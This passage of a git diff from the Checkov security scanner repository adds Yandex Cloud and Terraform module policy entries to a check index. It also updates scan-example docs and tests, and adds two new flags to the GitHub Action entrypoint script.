+| 2108 | CKV_TF_1        | module   | module                                                  | Ensure Terraform module sources use a commit hash                                                                                                                                                        | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py)                                                                                                     |
+| 2109 | CKV_TF_2        | module   | module                                                  | Ensure Terraform module sources use a tag with a version number                                                                                                                                          | Terraform | [RevisionVersionTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionVersionTag.py)                                                                                         |
+| 2110 | CKV_YC_1        | resource | yandex_mdb_clickhouse_cluster                           | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 2111 | CKV_YC_1        | resource | yandex_mdb_elasticsearch_cluster                        | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 2112 | CKV_YC_1        | resource | yandex_mdb_greenplum_cluster                            | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 2113 | CKV_YC_1        | resource | yandex_mdb_kafka_cluster                                | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 2114 | CKV_YC_1        | resource | yandex_mdb_mongodb_cluster                              | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 2115 | CKV_YC_1        | resource | yandex_mdb_mysql_cluster                                | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 2116 | CKV_YC_1        | resource | yandex_mdb_postgresql_cluster                           | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 2117 | CKV_YC_1        | resource | yandex_mdb_redis_cluster                                | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 2118 | CKV_YC_1        | resource | yandex_mdb_sqlserver_cluster                            | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 2119 | CKV_YC_2        | resource | yandex_compute_instance                                 | Ensure compute instance does not have public IP.                                                                                                                                                         | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py)                                                                                     |
+| 2120 | CKV_YC_3        | resource | yandex_storage_bucket                                   | Ensure storage bucket is encrypted.                                                                                                                                                                      | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py)                                                             |
+| 2121 | CKV_YC_4        | resource | yandex_compute_instance                                 | Ensure compute instance does not have serial console enabled.                                                                                                                                            | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py)                                                                           |
+| 2122 | CKV_YC_5        | resource | yandex_kubernetes_cluster                               | Ensure Kubernetes cluster does not have public IP address.                                                                                                                                               | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py)                                                                                                 |
+| 2123 | CKV_YC_6        | resource | yandex_kubernetes_node_group                            | Ensure Kubernetes cluster node group does not have public IP addresses.                                                                                                                                  | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py)                                                                               |
+| 2124 | CKV_YC_7        | resource | yandex_kubernetes_cluster                               | Ensure Kubernetes cluster auto-upgrade is enabled.                                                                                                                                                       | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py)                                                                                           |
+| 2125 | CKV_YC_8        | resource | yandex_kubernetes_node_group                            | Ensure Kubernetes node group auto-upgrade is enabled.                                                                                                                                                    | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py)                                                                         |
+| 2126 | CKV_YC_9        | resource | yandex_kms_symmetric_key                                | Ensure KMS symmetric key is rotated.                                                                                                                                                                     | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py)                                                                         |
+| 2127 | CKV_YC_10       | resource | yandex_kubernetes_cluster                               | Ensure etcd database is encrypted with KMS key.                                                                                                                                                          | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py)                                                                               |
+| 2128 | CKV_YC_11       | resource | yandex_compute_instance                                 | Ensure security group is assigned to network interface.                                                                                                                                                  | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py)                                                                           |
+| 2129 | CKV_YC_12       | resource | yandex_mdb_clickhouse_cluster                           | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 2130 | CKV_YC_12       | resource | yandex_mdb_elasticsearch_cluster                        | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 2131 | CKV_YC_12       | resource | yandex_mdb_greenplum_cluster                            | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 2132 | CKV_YC_12       | resource | yandex_mdb_kafka_cluster                                | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 2133 | CKV_YC_12       | resource | yandex_mdb_mongodb_cluster                              | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 2134 | CKV_YC_12       | resource | yandex_mdb_mysql_cluster                                | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 2135 | CKV_YC_12       | resource | yandex_mdb_postgresql_cluster                           | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 2136 | CKV_YC_12       | resource | yandex_mdb_sqlserver_cluster                            | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 2137 | CKV_YC_13       | resource | yandex_resourcemanager_cloud_iam_binding                | Ensure cloud member does not have elevated access.                                                                                                                                                       | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py)                                                                         |
+| 2138 | CKV_YC_13       | resource | yandex_resourcemanager_cloud_iam_member                 | Ensure cloud member does not have elevated access.                                                                                                                                                       | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py)                                                                         |
+| 2139 | CKV_YC_14       | resource | yandex_kubernetes_cluster                               | Ensure security group is assigned to Kubernetes cluster.                                                                                                                                                 | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py)                                                                                       |
+| 2140 | CKV_YC_15       | resource | yandex_kubernetes_node_group                            | Ensure security group is assigned to Kubernetes node group.                                                                                                                                              | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py)                                                                     |
+| 2141 | CKV_YC_16       | resource | yandex_kubernetes_cluster                               | Ensure network policy is assigned to Kubernetes cluster.                                                                                                                                                 | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py)                                                                                       |
+| 2142 | CKV_YC_17       | resource | yandex_storage_bucket                                   | Ensure storage bucket does not have public access permissions.                                                                                                                                           | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py)                                                         |
+| 2143 | CKV_YC_18       | resource | yandex_compute_instance_group                           | Ensure compute instance group does not have public IP.                                                                                                                                                   | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py)                                                               |
+| 2144 | CKV_YC_19       | resource | yandex_vpc_security_group                               | Ensure security group does not contain allow-all rules.                                                                                                                                                  | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py)                                                                       |
+| 2145 | CKV_YC_20       | resource | yandex_vpc_security_group_rule                          | Ensure security group rule is not allow-all.                                                                                                                                                             | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py)                                                               |
+| 2146 | CKV_YC_21       | resource | yandex_organizationmanager_organization_iam_binding     | Ensure organization member does not have elevated access.                                                                                                                                                | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py)                                                           |
+| 2147 | CKV_YC_21       | resource | yandex_organizationmanager_organization_iam_member      | Ensure organization member does not have elevated access.                                                                                                                                                | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py)                                                           |
+| 2148 | CKV_YC_22       | resource | yandex_compute_instance_group                           | Ensure compute instance group has security group assigned.                                                                                                                                               | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py)                                                     |
+| 2149 | CKV_YC_23       | resource | yandex_resourcemanager_folder_iam_binding               | Ensure folder member does not have elevated access.                                                                                                                                                      | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py)                                                                       |
+| 2150 | CKV_YC_23       | resource | yandex_resourcemanager_folder_iam_member                | Ensure folder member does not have elevated access.                                                                                                                                                      | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py)                                                                       |
+| 2151 | CKV_YC_24       | resource | yandex_organizationmanager_organization_iam_binding     | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
+| 2152 | CKV_YC_24       | resource | yandex_organizationmanager_organization_iam_member      | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
+| 2153 | CKV_YC_24       | resource | yandex_resourcemanager_cloud_iam_binding                | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
+| 2154 | CKV_YC_24       | resource | yandex_resourcemanager_cloud_iam_member                 | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
+| 2155 | CKV_YC_24       | resource | yandex_resourcemanager_folder_iam_binding               | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
+| 2156 | CKV_YC_24       | resource | yandex_resourcemanager_folder_iam_member                | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
 
 
 ---
diff --git a/docs/6.Contribution/Contribution Overview.md b/docs/6.Contribution/Contribution Overview.md
index 35cd4ac564e..55898cf0f62 100644
--- a/docs/6.Contribution/Contribution Overview.md	
+++ b/docs/6.Contribution/Contribution Overview.md	
@@ -100,7 +100,7 @@ Let's assume we're trying to create a new AWS resource Check to ensure all of ou
     ```
     $ pytest -k test_CheckovIsAwesome
     ================================================================================ test session starts ================================================================================
-    platform darwin -- Python 3.7.11, pytest-6.2.5, py-1.10.0, pluggy-1.0.0
+    platform darwin -- Python 3.10.14, pytest-6.2.5, py-1.10.0, pluggy-1.0.0
     rootdir: /path/to/checkov
     plugins: xdist-2.4.0, forked-1.3.0, cov-3.0.0
     collected 1952 items / 1951 deselected / 1 selected
@@ -162,7 +162,7 @@ Let's assume we're trying to create a new AWS resource Check to ensure all of ou
     ```
     $ pytest -k test_CheckovIsAwesome
     ================================================================================ test session starts ================================================================================
-    platform darwin -- Python 3.7.11, pytest-6.2.5, py-1.10.0, pluggy-1.0.0
+    platform darwin -- Python 3.10.14, pytest-6.2.5, py-1.10.0, pluggy-1.0.0
     rootdir: /Users/joseph.meredith/dev/jmeredith18/checkov
     plugins: xdist-2.4.0, forked-1.3.0, cov-3.0.0
     collected 1952 items / 1951 deselected / 1 selected
diff --git a/docs/7.Scan Examples/Git History.md b/docs/7.Scan Examples/Git History.md
index 55020f59a5e..2d947e72f37 100644
--- a/docs/7.Scan Examples/Git History.md	
+++ b/docs/7.Scan Examples/Git History.md	
@@ -20,12 +20,12 @@ Use `--secrets-history-timeout` to set how long the secrets scan will run on his
 
 A run with a timeout of `12h` by default:
 ```bash
-checkov -d <git dir> --scan-secrets-history --bc-api-key <your_api_key>
+checkov -d <git dir> --scan-secrets-history --bc-api-key <your_api_key> --repo-id <repo/name>
 ```
 
 A run with a timeout of `1h`:
 ```bash
-checkov -d <git dir> --scan-secrets-history --secrets-history-timeout 1h --bc-api-key <your_api_key>
+checkov -d <git dir> --scan-secrets-history --secrets-history-timeout 1h --bc-api-key <your_api_key> --repo-id <repo/name>
 ```
 
 ### Example output
diff --git a/docs/7.Scan Examples/Sca.md b/docs/7.Scan Examples/Sca.md
index b368495a3cf..3cc02718965 100644
--- a/docs/7.Scan Examples/Sca.md	
+++ b/docs/7.Scan Examples/Sca.md	
@@ -14,7 +14,7 @@ In order to use this feature, you first need to create an [API token using Prism
 
 ## Package scanning
 ```bash
-checkov -d . --framework sca_package --bc-api-key <access key>::<secret key> --prisma-api-url <prisma api url>
+checkov -d . --framework sca_package --bc-api-key <access key>::<secret key> --prisma-api-url <prisma api url> --repo-id <repo/name>
 ```
 
 ### Example output
diff --git a/dogfood_tests/test_checkov_dogfood.py b/dogfood_tests/test_checkov_dogfood.py
index 8838da4a025..8a5bebe18a2 100644
--- a/dogfood_tests/test_checkov_dogfood.py
+++ b/dogfood_tests/test_checkov_dogfood.py
@@ -56,6 +56,8 @@ def test_all_frameworks_are_tested() -> None:
         CheckType.SAST_JAVA,
         CheckType.SAST_PYTHON,
         CheckType.SAST_JAVASCRIPT,
+        CheckType.SAST_TYPESCRIPT,
+        CheckType.SAST_GOLANG,
         CheckType.SECRETS,
         CheckType.SERVERLESS,
         CheckType.TERRAFORM,
diff --git a/github_action_resources/entrypoint.sh b/github_action_resources/entrypoint.sh
index a9072eacf14..93ed806318f 100755
--- a/github_action_resources/entrypoint.sh
+++ b/github_action_resources/entrypoint.sh
@@ -31,6 +31,7 @@ fi
 [[ -n "$INPUT_HARD_FAIL_ON" ]] && HARD_FAIL_ON_FLAG="--hard-fail-on $INPUT_HARD_FAIL_ON"
 [[ -n "$INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT" ]] && INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG="--repo-root-for-plan-enrichment $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT"
 [[ -n "$INPUT_POLICY_METADATA_FILTER" ]] && POLICY_METADATA_FILTER_FLAG="--policy-metadata-filter $INPUT_POLICY_METADATA_FILTER"
+[[ -n "$INPUT_POLICY_METADATA_FILTER_EXCEPTION" ]] && POLICY_METADATA_FILTER_EXCEPTION_FLAG="--policy-metadata-filter-exception $INPUT_POLICY_METADATA_FILTER_EXCEPTION"
 
 if [ -n "$INPUT_OUTPUT_BC_IDS" ] && [ "$INPUT_OUTPUT_BC_IDS" = "true" ]; then
   OUTPUT_BC_IDS_FLAG="--output-bc-ids"
@@ -68,6 +69,10 @@ if [ -n "$INPUT_SKIP_DOWNLOAD" ] && [ "$INPUT_SKIP_DOWNLOAD" = "true" ]; then
   SKIP_DOWNLOAD_FLAG="--skip-download"
 fi
 
+if [ -n "$INPUT_DEEP_ANALYSIS" ] && [ "$INPUT_DEEP_ANALYSIS" = "true" ]; then
+  INPUT_DEEP_ANALYSIS_FLAG="--deep-analysis"
+fi
+
 if [ -n "$INPUT_LOG_LEVEL" ]; then
   export LOG_LEVEL=$INPUT_LOG_LEVEL
 fi
@@ -196,11 +201,11 @@ else
   fi
   # Build command
   if [ -n "$API_KEY_VARIABLE" ]; then
-    echo "checkov --bc-api-key XXXXXXXXX-XXX-XXXXX --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG"
-    CHECKOV_RESULTS=$(checkov --bc-api-key $API_KEY_VARIABLE --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG)
+    echo "checkov --bc-api-key XXXXXXXXX-XXX-XXXXX --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG"
+    CHECKOV_RESULTS=$(checkov --bc-api-key $API_KEY_VARIABLE --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG)
     else
-    echo "checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG"
-    CHECKOV_RESULTS=$(checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG)
+    echo "checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG"
+    CHECKOV_RESULTS=$(checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG)
   fi
 fi
 
diff --git a/integration_tests/prepare_data.sh b/integration_tests/prepare_data.sh
index 845536a768c..4b8ef8dde66 100755
--- a/integration_tests/prepare_data.sh
+++ b/integration_tests/prepare_data.sh
@@ -35,7 +35,6 @@ then
   pipenv run checkov -s -d terragoat/terraform/azure/ --repo-id checkov/integration_test --bc-api-key $BC_KEY > checkov_report_azuredir_api_key_terragoat.txt
   pipenv run checkov -s -d terragoat/terraform/azure/ --repo-id checkov/integration_test --skip-results-upload --bc-api-key $BC_KEY > checkov_report_azuredir_api_key_terragoat_no_upload.txt
   echo "running image referencing"
-  pipenv run checkov -s -d integration_tests/example_workflow_file/.github/workflows/ -o json --repo-id checkov/integration_test --bc-api-key $BC_KEY --include-all-checkov-policies > checkov_report_workflow_cve.json
   pipenv run checkov -s -d integration_tests/example_workflow_file/bitbucket/ -o json --repo-id checkov/integration_test --bc-api-key $BC_KEY --include-all-checkov-policies > checkov_report_bitbucket_pipelines_cve.json
   echo "running list"
